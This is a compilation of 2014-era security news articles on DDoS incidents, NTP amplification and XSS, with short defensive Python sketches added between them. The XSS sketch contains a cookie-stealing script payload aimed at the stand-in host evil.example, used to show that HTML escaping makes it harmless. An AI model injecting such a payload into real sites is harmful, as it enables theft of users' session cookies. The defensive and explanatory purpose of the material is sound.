
Whaleoil down due to DoS attack

Controversial right-wing website Whaleoil has been taken offline by a cyber attack, and its editor has received death threats, after he labelled a West Coast man killed in a car crash “feral”.

A denial of service (DoS) attack started last night, temporarily disabling the blog, and continued today, leaving the website completely unavailable since 8am. “We are pretty certain it is from New Zealand. We are also pretty certain, due to the fact that they are skiting about it on Facebook, that it is these ferals on the West Coast,” Whaleoil’s editor Cameron Slater said. A DoS attack is intended to block a website from its intended users by overloading the site with requests so it cannot be visited by legitimate traffic.

Slater has also received numerous death threats in text messages and on Facebook after a blog post, in which he described West Coast man Judd Hall, who died on Saturday, as a “feral”, was reported in the Greymouth Star. “They are pretty hot under the collar. I wrote a post about that munter who died smacking into that house and a Greymouth Star journalist beat it all up and that set them off in their feral ways,” Slater said. He posted one of the text message threats to his Facebook page; it said “we are coming for you” and “we know where you live.” There have been around 250 Facebook messages “imploring me to kill myself or that they are going to come round and kill me in lots of different manners,” Slater said. The threats have been reported to police.

It was initially believed that the DoS attack came from the subcontinent, after another post on the site revealed Indian web traffic to the news site Scoop. “Now with the gloating that is going on from the West Coast ferals we are pretty certain it is them that are involved in it,” Slater said.

The website should be back online shortly, but the DoS attack has left Slater without a large amount of advertising income. “I don’t discuss my revenues. It is basically a day and a half of revenue,” he said. A DoS attack is illegal under the Crimes Act and is punishable by up to seven years in prison.

Source: http://www.stuff.co.nz/technology/digital-living/30013080/whaleoil-down-due-to-dos-attack


Education sector is fastest growing for DDoS mitigation

The education sector is the fastest growing segment in taking up distributed denial of service (DDoS) mitigation, according to DDoS protection services firm DOSarrest.

The firm’s CTO, Jag Bains, told Computing that many companies – not just e-commerce firms – are deploying DDoS protection. “If their website goes down as a result of an attack, they can lose their SEO ranking or it could have an effect on their brand; there is a lot at stake aside from revenues,” he said.

And despite there not being a particular industry that treats DDoS protection as a must, DOSarrest’s general manager, Mark Teolis, claimed that the education sector is one area which has grown significantly. “Our fastest growing segment in the last six months is the education sector, believe it or not,” he said. Teolis explained that the firm was getting business from “schools from the UK, the US and international universities” but said he couldn’t identify a specific reason why the sector has shown a sudden interest.

Bains believes that it may be a result of educational institutions guarding themselves against their own students. “Students have easy access to DDoS tools, so they may want to try it against their own [school or university]. They could be motivated because they’re failing in something, and there are enough smart kids around to access tools – it is easy to Google them anyway,” he said.

But Teolis said that the tools have been available on the internet for a long time, and questioned why there was a sudden surge in interest from educational institutions. Bains suggested that it could be because school and university websites have become an integral part of the education system. “We’ve been talking about e-commerce and gaming [as being key industries for DDoS protection], but web presence itself is very important and schools and universities need to make their websites accessible. They need a website to give out grades, information and schedules – five years ago they weren’t really using the web page apart from explaining where the school is located,” he said.

But while the education sector may be taking a keen interest, Teolis claims that no one segment is “taking up 30 per cent of the market”. He said that “10 or 15 per cent of the market is as good as it gets”. As for a particular industry that has not taken DDoS as seriously as others, Teolis believes many e-commerce firms haven’t contemplated being the victim of a DDoS attack. “There are still the odd e-commerce guys out there [who haven’t taken it as seriously]. Money is rolling in and they’re just focused on that; DDoS for them is somebody else’s problem. A lot of it is ‘my ISP will deal with it’; the fact of the matter is, it is difficult to stop all of the attacks,” he said.

Source: http://www.computing.co.uk/ctg/news/2325009/education-sector-is-fastest-growing-for-ddos-mitigation-dosarrest


E-toll site weathers denial of service (DoS) attack

Sanral’s e-toll Web site suffered a denial of service (DoS) attack on Friday, according to the agency. “Some users complained of slow site performance, and our service provider traced the problem to a denial of service attack of international origin,” said Sanral spokesman Vusi Mona.

No further details of the attack were available, but Alex van Niekerk, project manager for the Gauteng Freeway Improvement Project, said the site has come under repeated attack since going live, but has suffered only minor performance degradation.

DoS attacks, particularly distributed denial of service (DDoS) attacks, are a popular technique used to knock sites offline, overwhelming them with traffic until they are unable to service their clients. Activist group Anonymous frequently uses DDoS to attack targets, using its wide base of supporters to generate traffic, and botnets often launch DDoS attacks from their installed base of zombie PCs. Last year, anti-spam service Spamhaus suffered one of the largest DDoS attacks in history, with incoming traffic peaking at 300Gbps, launched by a Dutch Web host known for harbouring spammers.

Sanral’s Web site has been the target of several attacks lately, including a hack which may have leaked personal information, a flaw which allowed motorists to be tracked in real time, and a session fixation attack which allowed login sessions to be hijacked.

Source: http://www.itweb.co.za/index.php?option=com_content&view=article&id=70192:e-toll-site-weathers-denial-of-service-attack


DDoS attacks get more complex – are networks prepared?

The threat of cyber attacks from both external and internal sources is growing daily. A denial of service, or DoS, attack is one of the most common. DoS attacks have plagued defense, civilian and commercial networks over the years, but the way they are carried out is growing in complexity. If you thought your systems were engineered to defend against a DoS attack, you may want to take another look.

Denial of service attack evolution

A denial of service attack is a battle for computing resources between the legitimate requests that a network and application infrastructure were designed for and illegitimate requests coming in solely to hinder the service provided or shut down the service altogether.

The first DoS attacks were primarily aimed at Layer 3 or Layer 4 of the OSI model and were designed to consume all available bandwidth, crash the system being attacked, or consume all of the available memory, connections or processing power. Some examples of these types of attacks are the Ping of Death, Teardrop, SYN flood and ICMP flood. As operating system developers, hardware vendors and network architects began to mitigate these attacks, attackers had to adapt and discover new methods, which has led to an increase in the complexity and diversity of the attacks used.

Since DoS attacks require a high volume of traffic — typically more than a single machine can generate — attackers may use a botnet: a network of computers under the control of the attacker, usually subverted through malicious means. This type of DoS, called a distributed denial of service (DDoS), is harder to defend against because the traffic will likely be coming from many directions.

While the goal of newer DoS attacks is the same as older attacks, the newer attacks are much more likely to be application layer attacks launched against higher level protocols such as HTTP or the Domain Name System. Application layer attacks are a natural progression for several reasons: 1) lower level attacks were well known and system architects knew how to defend against them; 2) few mechanisms, if any, were available to defend against these newer types of attacks; and 3) data at a higher layer is much more expensive to process, thus consuming more computing resources.

As attacks go up the OSI stack and deeper into the application, they generally become harder to detect, and therefore more expensive, in terms of computing resources, to defend against. If the attack is more expensive to defend against, it is more likely to cause a denial of service. More recently, attackers have been combining several DDoS attack types; an L3/L4 attack in combination with an application layer attack, for instance, is referred to as diverse distributed denial of service, or 3DoS.

Internet and bandwidth growth impact DoS

Back in the mid- to late 1990s, fewer computers existed on the Internet. Connections to the Internet and other networks were smaller, and not much existed in the way of security awareness. Attackers generally had less bandwidth to the Internet, but so did organizations. Fast forward to the present, and it’s not uncommon for a home connection to have 100 megabits per second of available bandwidth to the Internet. These faster connections give attackers the ability to send more data during an attack from a single device.
The Internet has also become more sensitive to privacy and security, which has led to encryption technologies such as Secure Sockets Layer/Transport Layer Security being used to encrypt data transmitted across a network. While the data can be transported with confidence, the trade-off is that encrypted traffic requires extra processing power. A device encrypting traffic will typically be under a greater load and therefore unable to process as many requests, leaving it more susceptible to a DoS attack.

Protection against DoS attacks

As mentioned previously, DoS attacks are not simply a network issue; they are an issue for the entire enterprise. When building or upgrading an infrastructure, architects should consider current traffic and future growth, and should have resources in place that anticipate a DoS attack being launched against the infrastructure, thereby creating a more resilient infrastructure.

A more resilient infrastructure does not always mean buying bigger iron. Resiliency and higher availability can be achieved by spreading the load across multiple devices using dedicated hardware Application Delivery Controllers (ADCs). Hardware ADCs evenly distribute the load across all types of devices, providing a more resilient infrastructure, and also offer offloading capabilities for technologies such as SSL and compression.

When choosing a device, architects should consider whether it offloads some processing to dedicated hardware. A typical server is purchased with a general purpose processor to handle all computing tasks, whereas more specialized hardware offers dedicated circuitry for tasks such as protection against SYN floods and SSL offload. This typically allows such devices to handle exponentially more traffic, which in turn makes them more capable of thwarting an attack.

Since attacks are spread across multiple levels of the OSI model, tiered protection is needed all the way from the network up to the application design. This typically equates to L3/L4 firewalls sitting close to the edge, protecting against some of the more traditional DoS attacks, with more specialized defense mechanisms, such as Web Application Firewalls (WAFs), handling application layer traffic. WAFs can be a vital ally in protecting a Web infrastructure by defending against various types of malicious attacks, including DoS, and they fill an important void in Web application intelligence left behind by L3/L4 firewalls.

As demonstrated, many types of DoS attacks are possible and can be generated from many different angles. DoS attacks will continue to evolve at the same — often uncomfortably fast — rate as our use of technology. Understanding how these two evolutions are tied together will help network and application architects be vigilant and better weigh the options at their disposal to protect their infrastructure.

Source: http://defensesystems.com/Articles/2013/12/19/DOS-attacks-complexity.aspx?admgarea=DS&Page=3
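The tiered defenses the article describes ultimately come down to deciding, per request, whether traffic stays within a sane budget. As a rough illustration of the kind of per-client throttling an application layer defense might apply — a minimal sketch of ours, not drawn from the article, with the names and thresholds invented for illustration — here is a token-bucket rate limiter in Python:

import time
from collections import defaultdict

RATE = 5.0    # sustained requests per second allowed per client
BURST = 10.0  # bucket capacity: the largest burst a client may send

# Per-client bucket state: [tokens remaining, timestamp of last refill].
_buckets = defaultdict(lambda: [BURST, time.monotonic()])

def allow_request(client_key: str) -> bool:
    """Return True if this client is within its rate budget."""
    tokens, last = _buckets[client_key]
    now = time.monotonic()
    # Refill tokens for the elapsed time, capped at the bucket size.
    tokens = min(BURST, tokens + (now - last) * RATE)
    if tokens >= 1.0:
        _buckets[client_key] = [tokens - 1.0, now]
        return True    # serve the request
    _buckets[client_key] = [tokens, now]
    return False       # drop, delay, or challenge the request

# A client hammering the endpoint exhausts its burst, then is refused.
for i in range(15):
    print(i, allow_request("203.0.113.7"))

A sketch like this would sit behind, not instead of, the L3/L4 protections described above, and a real WAF would key its buckets on something richer than a single client identifier.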


Mobile devices increasingly used to launch sophisticated DDoS attacks

DDoS attacks still plague businesses worldwide, and cyber criminals are increasingly using mobile devices to launch attacks.

The threat of distributed denial of service (DDoS) attacks against enterprise users from mobile applications is increasing as more users go mobile, according to DDoS security company Prolexic. Cyber criminals are finding that mobile devices make for a powerful attack tool – and are surprisingly easy to use.

“Mobile devices add another layer of complexity,” said Stuart Scholly, Prolexic President, in a press statement. “Because mobile networks use super proxies, you cannot simply use a hardware appliance to block source IP addresses as it will also block legitimate traffic. Effective DDoS mitigation requires an additional level of fingerprinting and human expertise so specific blocking signatures can be developed on-the-fly and applied in real-time.”

DDoS attacks can lead to website and server downtime, interrupt day-to-day business operations, and result in lost revenue and wasted manpower. Prolexic found a 26 percent increase in DDoS attacks from Q4 2012 to Q4 2013, with a significant number involving advanced DDoS attack weapons.

Source: http://www.tweaktown.com/news/34862/mobile-devices-increasingly-used-to-launch-sophisticated-ddos-attacks/index.html
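Scholly’s point about super proxies is that many mobile clients share a handful of carrier IP addresses, so blocking by source IP punishes legitimate users. One way to picture the “fingerprinting” alternative — a minimal sketch under our own assumptions, not Prolexic’s method, with all field names and thresholds invented — is to key rate counters on a hash of request attributes rather than on the IP alone:

import hashlib
from collections import Counter

def fingerprint(request: dict) -> str:
    """Collapse request attributes into a blocking-signature key.

    Deliberately ignores the source IP: behind a carrier super proxy,
    thousands of legitimate users may share one address, so we key on
    how the traffic looks rather than where it appears to come from.
    """
    material = "|".join([
        request.get("user_agent", ""),
        request.get("path", ""),
        request.get("accept_language", ""),
        request.get("header_order", ""),  # bots often send headers in odd orders
    ])
    return hashlib.sha256(material.encode()).hexdigest()[:16]

counts = Counter()

def suspicious(request: dict, threshold: int = 1000) -> bool:
    """Flag a fingerprint once it dominates recent traffic."""
    fp = fingerprint(request)
    counts[fp] += 1
    return counts[fp] > threshold

# Identical automated requests converge on one fingerprint, while
# varied human traffic spreads across many.
bot = {"user_agent": "evil/1.0", "path": "/login", "accept_language": ""}
print(fingerprint(bot))

A production system would age counters out over a sliding window and turn a flagged fingerprint into a temporary blocking rule — roughly the “signatures developed on-the-fly” workflow the quote describes.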


US-CERT warns of NTP Amplification attacks

US-CERT has issued an advisory warning enterprises about distributed denial of service attacks that flood networks with massive amounts of UDP traffic using publicly available network time protocol (NTP) servers. In these NTP amplification attacks, hackers exploit the monlist feature of NTP servers, also known as MON_GETLIST, which returns the IP addresses of the last 600 machines that interacted with an NTP server. NTP is a classic set-and-forget protocol, generally used to sync clocks between servers and computers, and it is vulnerable to hackers making forged REQ_MON_GETLIST requests that enable traffic amplification. “This response is much bigger than the request sent making it ideal for an amplification attack,” said John Graham-Cumming of Cloudflare.

According to US-CERT, the MON_GETLIST command allows admins to query NTP servers for traffic counts. Attackers send this command to vulnerable NTP servers with the source address spoofed as the victim. “Due to the spoofed source address, when the NTP server sends the response it is sent instead to the victim. Because the size of the response is typically considerably larger than the request, the attacker is able to amplify the volume of traffic directed at the victim,” the US-CERT advisory says. “Additionally, because the responses are legitimate data coming from valid servers, it is especially difficult to block these types of attacks.”

To mitigate these attacks, US-CERT advises disabling monlist or upgrading to NTP version 4.2.7, in which monlist is disabled. NTP amplification attacks have been blamed for recent DDoS attacks against popular online games such as League of Legends, Battle.net and others. Ars Technica today reported that the gaming servers were hit with up to 100 Gbps of UDP traffic. Similar traffic volumes were used to take down American banks and financial institutions last year in allegedly politically motivated attacks.

“Unfortunately, the simple UDP-based NTP protocol is prone to amplification attacks because it will reply to a packet with a spoofed source IP address and because at least one of its built-in commands will send a long reply to a short request,” Graham-Cumming said. “That makes it ideal as a DDoS tool.” He added that an attacker can retrieve a list of open NTP servers that support monlist using readily available Metasploit or Nmap modules.

Graham-Cumming demonstrated the kind of amplification possible in such an attack. He used the MON_GETLIST command on an NTP server, sending a request packet 234 bytes long; the response was split across 10 packets and was 4,460 bytes long. “That’s an amplification factor of 19x and because the response is sent in many packets an attack using this would consume a large amount of bandwidth and have a high packet rate,” Graham-Cumming said. “This particular NTP server only had 55 addresses to tell me about. Each response packet contains 6 addresses (with one short packet at the end), so a busy server that responded with the maximum 600 addresses would send 100 packets for a total of over 48k in response to just 234 bytes. That’s an amplification factor of 206x!”

Source: http://threatpost.com/us-cert-warns-of-ntp-amplification-attacks/103573
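The amplification factors Graham-Cumming quotes follow directly from the packet sizes in the article; a few lines of Python reproduce the arithmetic (the worst-case byte total is our back-calculation from the quoted 206x factor):

# Figures from Graham-Cumming's demonstration in the article.
request_bytes = 234        # forged MON_GETLIST request
response_bytes = 4_460     # response: 10 packets carrying 55 addresses
print(f"{response_bytes / request_bytes:.0f}x")  # 19x, as quoted

# Worst case: a busy server returning the maximum 600 addresses sends
# 600 / 6 = 100 response packets. Back-calculating from the quoted
# 206x factor gives the "over 48k" total the article mentions.
packets = 600 // 6
total_bytes = 206 * request_bytes
print(packets, total_bytes)  # 100 packets, 48204 bytes (~48KB)

On the mitigation side, the US-CERT advisory’s advice amounts to a one-line change for servers that cannot be upgraded: adding `disable monitor` to ntp.conf switches off monlist responses.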


Dropbox hit by DDoS attack, but user data safe; The 1775 Sec claims responsibility

The Dropbox website went offline last night, with a hacking collective calling itself The 1775 Sec claiming responsibility for the attack on the cloud storage company’s website.

The 1775 Sec took to Twitter just a few moments before Dropbox went down on Friday night, claiming that they were responsible. “BREAKING NEWS: We have just compromised the @Dropbox Website http://www.dropbox.com #hacked #compromised” tweeted The 1775 Sec. This tweet was followed by another wherein the group claimed that it was giving Dropbox time to fix their vulnerabilities, and that if they failed to do so, they should expect a database leak. The group claimed that the hack was in honour of Aaron Swartz. Dropbox’s status page at the time acknowledged that there was downtime and that they were ‘experiencing issues’.

The hackers then revealed that their claims of a database leak were a hoax. “Laughing our asses off: We DDoS attacked #DropBox. The site was down how exactly were we suppose to get the Database? Lulz” tweeted The 1775 Sec. The group claimed that they only launched a DDoS attack, didn’t breach Dropbox security and didn’t have access to Dropbox user data.

Dropbox said that its website was down because of issues during “routine maintenance” rather than a malicious attack. In a statement Dropbox said: “We have identified the cause, which was the result of an issue that arose during routine internal maintenance, and are working to fix this as soon as possible… We apologize for any inconvenience.”

Just over an hour ago, Dropbox said that its site was back up. “Dropbox site is back up! Claims of leaked user info are a hoax. The outage was caused during internal maintenance. Thanks for your patience!” read the tweet from Dropbox.

Source: http://www.techienews.co.uk/974664/dropbox-hits-ddos-user-data-safe-1775-sec-claims-responsibility/


The 2014 cyber security roadmap

The burgeoning Internet of Things and smart devices

2014 is likely to be the year that many industries start to cash in on the much-hyped benefits of smart connected devices. But as more devices become IP-enabled, they contribute to the pool of things that can be recruited into botnets or other platforms used for distributed attacks – something most companies are currently not prepared for, warns Mike Foreman, general manager of security software firm AVG Technologies. ‘Distributing attacks via unmanned smart devices helps make it more difficult to trace the source and easier to overwhelm the target,’ says Foreman.

In order to meet the challenge of securely managing hundreds of millions of connected devices and securing the data transmitted between them, Jason Hart, VP of cloud solutions at security specialist SafeNet, says that organisations will need public key infrastructure solutions that combine comprehensive security with scalability and reliability. ‘PKIs, simply put, use digital certificates that can be embedded within devices, giving them the authorisation needed to access different networks,’ explains Hart. (A minimal sketch of minting such a device certificate appears after this section.)

BYOD convenience vs. security

Companies will need to adopt new tactics to tackle the increasing drawbacks of a BYOD environment, changing their focus from the devices themselves. When it comes to effective device management, says Chris Wysopal, co-founder and chief information security officer of application security expert Veracode, apps, not devices, are the real problem. ‘Companies need to look for MDMs that understand what apps are installed across corporate and BYOD devices, and the risk associated with those applications,’ he advises. Jonathan Foulkes of systems management software firm Kaseya thinks businesses will need to shift the focus away from devices and onto securing and managing data. ‘By “containerising” corporate data and only providing access through secure applications, IT is given full control over policies and the ability to decide which users – rather than devices – are allowed to connect to what data and with what application.’

The true security risks of cloud computing beginning to emerge

The horse has left the barn for IT teams dealing with the cloud. Business units are demanding it and building apps there if their IT departments will not – and this is a trend that is set to continue in 2014 as adoption of core applications in the cloud grows. ‘This opens up application change errors that can be totally missed by the security team,’ warns Reuven Harrison, CTO of security policy orchestration company Tufin. ‘It also increases silos and puts the business network at great risk by bypassing traditional IT structures.’ Veracode’s Chris Wysopal stresses that cloud apps will need to follow the same application security practices that the organisation requires for internally built apps, while moving towards end-to-end automation of network changes should free up time to concentrate on monitoring all areas of the network.

Controlling the privileged user

Without a doubt, one of the biggest mistakes that organisations make is having insufficient control and oversight of the actions of ‘privileged users’, says Paul Ayers, VP EMEA of security firm Vormetric. ‘In 2014, after the Snowden leaks and other high-profile insider threats and data breaches, I expect organisations to increasingly put in place the security procedures and tools that allow them to audit and control the actions of these users,’ he comments.
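To make Hart’s PKI point concrete, here is a minimal sketch of minting a device certificate with the Python `cryptography` package — our illustration, not SafeNet’s product; a real deployment would have a CA sign the device key rather than self-sign, and the names are invented:

import datetime
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import ec

# Each device gets its own key pair; the private key never leaves it.
device_key = ec.generate_private_key(ec.SECP256R1())

# The identity the network will authorise; "device-0042" is invented.
name = x509.Name([
    x509.NameAttribute(NameOID.COMMON_NAME, "device-0042"),
    x509.NameAttribute(NameOID.ORGANIZATION_NAME, "Example IoT Fleet"),
])

# Self-signed for brevity; in practice a CA would sign a CSR instead.
now = datetime.datetime.now(datetime.timezone.utc)
cert = (
    x509.CertificateBuilder()
    .subject_name(name)
    .issuer_name(name)
    .public_key(device_key.public_key())
    .serial_number(x509.random_serial_number())
    .not_valid_before(now)
    .not_valid_after(now + datetime.timedelta(days=365))
    .sign(device_key, hashes.SHA256())
)

# The PEM blob below is what gets embedded in the device's firmware.
print(cert.public_bytes(serialization.Encoding.PEM).decode())

The certificate is the device’s network credential: anything that can verify the issuing CA’s signature can authorise the device without a shared password ever crossing the wire.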
The effects of cyber war and cyber espionage

Cyber is the new battlefield, and the fifth element of warfare, with states already pouring a huge range of resources into both defensive and offensive capabilities. ‘Within the next couple of years, we will experience an increasing number of cyber attacks resulting in militaristic and economic damage,’ says Jarno Limnell, director of cyber security at McAfee Group company Stonesoft. Rik Ferguson, VP of security research at security vendor Trend Micro, notes that the PRISM revelations will increasingly lead cyber criminals to turn to ‘darknets’ – a class of networks, such as The Onion Router (TOR), that guarantee anonymous and untraceable online access. ‘Law enforcement agencies may not have enough knowledge or experience to deal with cyber crime and will have a hard time tracking criminals in the Deep Web, prompting more investment in the fight against cyber crime,’ he says.

Strengthened government agenda on cyber security and new compliance standards

Over 2013-14, the UK Cabinet Office will have invested £180 million in cyber security, increasing this amount to £210 million in 2014-15. The government has announced its intention to back a new kite-mark standard for cyber security, with further details promised early this year. Around the same time, the European Commission will unveil a new directive on data privacy. ‘But while these measures are to be welcomed, organisations will have their work cut out preparing themselves to achieve compliance,’ says Alan Calder, founder of cyber security services provider IT Governance. ‘Add to these changes the multiple compliance challenges arising from recent updates of standards, such as ISO 27001 and PCI DSS, and you quickly have a considerable governance task in terms of planning, resourcing and training.’

The security skills gap

The world faces an acute shortage of cyber security professionals who are adequately skilled for today’s threat landscape. According to Alan Calder of IT Governance, in 2014 we will feel the effects of this shortfall more than ever, resulting in yet more spectacular data breaches, as it will be several uncomfortable years before supply meets demand. ‘Large accountancy and professional services firms are, at the moment, heavily investing in IT security talent, which means that SMEs will struggle to compete for the best talent, putting the future of their businesses at risk,’ says Christian Toon, risk and security expert at data protection company Iron Mountain. Toon urges that when recruiting IT security professionals, companies should remember that it’s important to get someone who understands not just the technicalities of the job, but also the psychology of both the individuals they are helping to protect and the cyber criminals who are attempting to steal information from the business.

The ever-increasing sophistication of DDoS attacks

The transparency shown by RBS in admitting that it failed to invest properly in its IT systems after DDoS attacks in 2013 is a common refrain amongst many enterprises, large and small. But, says Jag Bains, CTO of DDoS attack prevention firm DOSarrest Internet Security, ‘While each organisation may have multiple reasons for failing to invest, they all share the same notion that they won’t be a target – until they get attacked.’ With DDoS tools becoming more advanced and pervasive, Bains warns that all IT operations should work under the premise that they will be attacked, and plan accordingly.
‘Every stack and layer within their purview should be reviewed, and they should identify cost-effective cloud solutions for their DDoS protection, which provide much better performance and mitigation than expensive hardware.’ Catherine Pearce, security consultant at mobile security firm Neohapsis, predicts that DDoS attackers will accelerate a move from simple volumetric attacks to those that take advantage of a site’s specific performance, with the spread of tools that profile specific targets and attack based upon certain weaknesses in configuration or implementation.

Smarter analytics to combat cyber threats

Martin Borrett, director at the IBM Institute for Advanced Security, believes that analytics will become a vital element in countering new threats, aided by advancements in machine learning algorithms that will further improve data and analytics technologies. ‘Security systems will greatly benefit from real-time correlation across massive structured data, such as security device alerts, operating system logs, DNS transactions and network flows, as well as unstructured data, such as emails, social media content, packet info and business transactions,’ says Borrett. ‘Organisations can begin along this path by surveying the additional new data sources available and considering which could be used to improve their security analysis outcomes.’ However, each data source may bring its own challenges, such as the volume, velocity, variety and veracity of data, so it will be important for a business to also consider which skills and tools it has available to manage these issues.

Challenges regarding authentication technologies such as two-factor and biometric

‘With companies slowly adopting BYOD programmes, on-premise software still reigning supreme in many IT environments and big hacking attacks occurring every few weeks, there’s no question that the business world still lags in adopting people-centric technologies across workforces,’ says Phil Turner, VP EMEA at identity management company Okta. ‘As a result, in 2014, as businesses have added more applications and the proliferation of devices in the workplace continues to increase, we are likely to see significant growth in cloud-based identity and access management (IAM) services that can deliver single sign-on across all applications.’

However, looking towards the end of 2014, we can expect this to start to change. Multi-factor authentication (MFA) – which requires two or more factors to verify the legitimacy of the user – has taken off and evolved substantially in the past decade, and authentication methodologies are becoming as personalised and specific to the individual as the experiences they are trying to access. ‘Customers’ expectations for seamless trusted authentication and the continued dominance of smartphones and smart devices will accelerate the move from legacy hardware one-time password tokens to mobile-friendly, embedded security and contextual access controls,’ says SafeNet’s Jason Hart. ‘We can already see early examples such as Apple’s Touch ID for biometric authentication, and investments by vendors such as Samsung to bake enterprise-grade security controls into their KNOX platform.’

Cyber resilience, not cyber security

In 2014, we will see savvier organisations relinquish futile hopes of ‘cyber security’ for a more pragmatic drive for ‘cyber resilience’. ‘We are living permanently with an irreducible level of cyber threat,’ says IT Governance’s Alan Calder.
‘As this realisation sinks in, organisations must adapt their strategies to avoid unhelpful restrictions on staff mobility and internet access, while ensuring their ability to recover swiftly when attacks take place.’ Jason Hart of SafeNet reiterates that in the coming year we can expect to see companies move away from the traditional strategy of focusing on breach prevention, and towards a ‘secure breach’ approach. ‘This means accepting that breaches happen and using best practice data protection to guarantee that data is effectively useless when it falls into unauthorised hands,’ he says. ‘So, we can expect to see an increase in the use of encryption that renders any data useless to an unauthorised party.’

Source: http://www.information-age.com/technology/security/123457584/the-2014-cyber-security-roadmap
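The ‘secure breach’ idea Hart describes — stolen data that is useless without the key — reduces, at its simplest, to authenticated encryption of data at rest. Here is a minimal sketch using the Python `cryptography` package’s Fernet recipe; this is our illustrative example, not a SafeNet product, and the record contents are invented:

from cryptography.fernet import Fernet, InvalidToken

# The key lives in a key management system, never beside the data.
key = Fernet.generate_key()
f = Fernet(key)

record = b"name=Jane Doe; card=4111-1111-1111-1111"
token = f.encrypt(record)   # what an attacker would actually exfiltrate

# Without the key the token is opaque, and tampering is detected.
try:
    Fernet(Fernet.generate_key()).decrypt(token)  # wrong key
except InvalidToken:
    print("ciphertext is useless to an unauthorised party")

print(f.decrypt(token))     # only the key holder recovers the record

The design point is that a breach of the data store alone yields nothing; the attacker must also compromise the separately held key, which is exactly the property Hart’s ‘effectively useless’ phrasing relies on.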


How EA, League of Legends & Battle.net Were Brought Down By DDoS Attacks

Last week, a group calling themselves DERP launched DDoS attacks on the servers of a number of the world’s biggest games (and games companies). It seemed like an awfully big list of victims for such a simple and ancient form of attack, but as Ars Technica explains, there was a bit more to it than that.

Unlike a standard DDoS attack, which big services like Battle.net and League of Legends would have been able to defeat, the attackers used a new – and obviously incredibly effective – method. “Rather than directly flooding the targeted services with torrents of data”, Ars explains, “an attack group calling itself DERP Trolling sent much smaller sized data requests to time-synchronization servers running the Network Time Protocol (NTP). By manipulating the requests to make them appear as if they originated from one of the gaming sites, the attackers were able to vastly amplify the firepower at their disposal. A spoofed request containing eight bytes will typically result in a 468-byte response to a victim, a more than 58-fold increase.”

According to “DoS-mitigation service” Black Lotus, while this sounds bad, it’s easy to protect against. Though, they would say that, wouldn’t they.

Source: http://kotaku.com/how-ea-league-of-legends-battle-net-were-brought-dow-1498272633


Could Cross-site scripting (XSS) be the chink in your website’s armour?

Sean Power, security operations manager for DOSarrest Internet Security, gives his advice on how businesses that rely heavily on their web presences can avoid (inadvertently) making their users susceptible to malicious attackers.

Cross-site scripting, commonly known as XSS, is a popular attack vector and gets its fair share of the limelight in the press, but why is it such a problem and how is it caused? Essentially, XSS is a code vulnerability in a website that allows an attacker to inject malicious client-side scripts into a web page viewed by a visitor. When you visit a site that has been compromised by an XSS attack, you will be inadvertently executing the attacker’s program in addition to viewing the website. This code could be downloading malware, copying your personal information, or using your computer to perpetuate further attacks. Of course, most people don’t look at the scripting details on the website, but with popular wikis and web 2.0 content that is constantly updated and changed, it’s important to understand the ramifications from a security standpoint.

In order to be interactive, modern websites require a high degree of input from the user, and these input points are exactly where attackers can inject content that will download malware to a visitor or enslave their computer. This makes it hard for site owners to monitor the ‘open’ areas of their websites and to continually update and review them. XSS code can appear on the web page, in banner ads, even as part of the URL; and if it’s a site that is visited regularly, users will as good as submit themselves to the attacker. In addition, as XSS code runs on the client side, it has access to anything that JavaScript has access to in the browser, such as cookies that store information about browsing history.

One of the real concerns about XSS is that by downloading script to a client-side computer, that endpoint can become enslaved into a botnet – a group of computers that have been infected with malware in order to allow a third party to control them – and used to participate in denial of service attacks. Users might not even be aware that they are part of an attack. In a recent case, we identified how a popular denial of service engine called ‘JSLOIC’ was used as script in a popular website, making any visitor an unwitting participant in a denial of service attack against a third party for as long as that browser window remained open.

The range of what can be accomplished is huge: malware can be inserted into a legitimate website, turning it into a watering hole that can infect a visitor’s computer, and this can impact anyone. Once the XSS is put into a website, the user becomes a victim and the attacker has access to all of the information that the browser has.

In terms of preventing it: firstly, the hole in the website that has been exploited has to be closed. The main tactic to prevent XSS code running on your website is to make sure you are ‘locking all the doors’, reviewing your website code regularly to remove bugs and any vulnerabilities. Done properly, this is a continual process. If a website carries malware because the owner is not reviewing it regularly, attackers will be able to alter the malicious code to dominate the page and infect more visitors. You can limit the chances of getting malicious code on your website by routinely auditing the website for unintended JavaScript inclusions.
But with XSS, especially non-persistent XSS, the best defence is to validate all data coming in: don’t include any supporting language, and make sure everything coming in is sanitised, or checked for malicious code. This is especially true for parts of your website that get regular updates, like comment sections. It is not enough to assume that because the site was clean before, new updates will also be clean. Even if you follow proper security coding and go through code reviews, websites sometimes sit unchanged for six months; that is why vulnerability testing is important as new bugs come up. Remember, HTTP and HTML are full of potential vulnerabilities; they were designed in the early days of the web, and no one then imagined what they would become. So when writing website code, if you do not consider SQL injection or XSS, you will write a website full of holes.

Top three tips:

– Review your website and sanitise your code regularly to ensure there is no malicious code or holes where code can be inserted.

– Consider not allowing comments to host external links, or approve those links before they are published, to prevent code from being inserted easily.

– Watch your web traffic in and out of your website for signs of unusual behaviour.

Source: http://www.information-age.com/technology/security/123457575/could-xss-be-the-chink-in-your-website-s-armour-
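Power’s ‘sanitise everything coming in’ advice has a small, concrete core: never echo raw user input back into a page. Here is a minimal sketch in Python — illustrative only, using the standard library’s html.escape rather than any DOSarrest tooling, with the function and field names invented:

import html

def render_comment(author: str, body: str) -> str:
    """Build a comment snippet with all user input HTML-escaped.

    Escaping turns characters like < > & " into entities, so a payload
    such as <script>...</script> is displayed as text instead of run.
    """
    safe_author = html.escape(author, quote=True)
    safe_body = html.escape(body, quote=True)
    return f"<div class='comment'><b>{safe_author}</b>: {safe_body}</div>"

# A classic reflected-XSS probe is rendered harmless:
payload = "<script>new Image().src='http://evil.example/?c='+document.cookie</script>"
print(render_comment("mallory", payload))
# -> the <script> tag appears as inert text, not executable code

Output escaping of this kind complements, rather than replaces, the input validation and routine code audits the article recommends, since it protects the page even when a malicious string slips through.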
